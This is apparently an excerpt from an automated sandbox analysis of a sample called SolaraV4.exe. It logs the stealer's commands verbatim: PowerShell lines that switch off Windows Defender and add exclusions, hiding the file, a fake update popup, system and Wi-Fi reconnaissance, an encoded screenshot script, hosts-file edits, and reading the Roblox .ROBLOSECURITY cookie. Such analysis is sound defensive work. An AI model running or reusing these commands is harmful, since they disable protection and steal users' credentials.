Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SolaraV4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SolaraV4.exe ReversingLabs: Detection: 52%
Source: SolaraV4.exe String found in binary or memory: set-addPolicy
Source: SolaraV4.exe String found in binary or memory: id-cmc-addExtensions
Source: SolaraV4.exe String found in binary or memory: can't send non-None value to a just-started %s
Source: SolaraV4.exe String found in binary or memory: --help
Source: SolaraV4.exe String found in binary or memory: --help
Source: C:\Users\user\Desktop\SolaraV4.exe File read: C:\Users\user\Desktop\SolaraV4.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\tree.com Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv ANBeg33fjE+FOmtUGvWY6g.0.2
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
